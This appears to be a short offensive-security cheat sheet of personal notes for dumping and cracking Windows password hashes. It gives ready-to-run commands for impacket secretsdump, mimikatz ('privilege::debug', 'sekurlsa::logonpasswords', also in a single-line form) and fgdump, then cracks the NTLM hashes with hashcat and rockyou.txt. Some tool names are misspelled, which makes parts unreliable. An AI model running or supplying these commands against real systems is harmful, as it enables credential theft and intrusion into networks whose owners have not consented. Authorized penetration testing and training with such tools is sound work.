*Using Impacket-secretdump
impacket-secretdump “<domain>/<user>:<password>@<ip>”
*Using mimikatz
-
Transfer all 3 mimikatz file to run mimikatz.exe from /usr/share/windows-resources/mimikatz/
mimikatz.exe
-
Give privilege access
privilege::debug
-
sekurlsa::logonpasswords
retrieve password hash
- If somehow mimikatz don’t work.. try in single command
./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit”
*Using fsdump
- transfer from usr/share/windows-resources/binaries/fgdump/fgdump.exe
- fgdump.exe
- 127.0.0.1.pwdump will have all hashes
Crack
- hashcat -m 1000 hash rockyou.txt